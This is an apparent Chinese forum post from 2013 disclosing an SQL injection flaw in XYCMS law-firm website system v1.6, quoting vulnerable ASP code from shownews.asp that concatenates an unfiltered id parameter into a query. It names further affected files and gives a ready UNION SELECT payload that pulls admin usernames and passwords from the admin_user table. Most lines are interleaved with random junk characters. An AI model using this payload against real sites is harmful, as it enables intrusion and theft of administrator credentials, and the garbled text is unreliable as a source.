前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
9 B" d* M- N, J/ X K( n
3 ]# R% t1 \3 c* u淫荡分割线
1 d" L5 h1 v+ c+ I; A--------------------------------------------------------
5 f+ T9 X4 b8 c! E % p h- ~, a3 X$ G& U
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
( G4 @9 F7 K* a; O3 M2 ?1 C源码地址:http://down.chinaz.com/soft/29233.htm
( |$ y+ ~7 S2 ` 9 F5 ?% a M& w& S7 x7 w
漏洞文件:shownews.asp
' `" X& [8 [! C) J1 K" e漏洞代码:7-13行
" W- N# Z) W) b* M( J" w1 U : m* Z% A8 y+ w0 A, E) ]
$ @& }2 Y8 V2 o" K, a0 R<%
( [/ B8 H Z3 }( X- o5 z) Eid=request.QueryString("id")
, F) k7 T; ~! _; a' _
3 d5 q8 I# H3 l, O; T$ T0 \set snews=server.createobject("adodb.recordset")
5 l( ]* R# J- r5 yexec="select * from [news] where id="&id
+ u. E: B' f1 A. b# U- D1 rsnews.open exec,conn,1,1
% C* u/ Q) ?* ^& j, b; e! V%>
7 w* k& j U0 H: n* [, R3 A$ D2 [
; c+ [2 j6 w$ E) e: P6 ` & h9 g8 b Z8 P0 o( A, o
什么过滤都没有 直造成注入( o2 N' k: u0 ^5 Q
T& m/ _7 B% ?* |; L0 E注入点:http://127.0.0.1:99/shownews.asp?id=xx; E- H7 C9 b& X
$ h* X3 h' W5 @" E' i" q
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
4 g5 j7 p% N! b! |" }! O- X8 l
$ |7 g+ O9 u4 {, A# V+ {, d1 E& I
- x8 q; d6 C2 y+ j. wexp: union select 1,admin,password,4,5,7 from admin_user
2 @/ L) X9 |8 `4 i# B$ |* j. _
0 M6 }* M9 Z9 H+ l" F6 x |
发表于 2013-4-4 17:28:12
收藏
支持
反对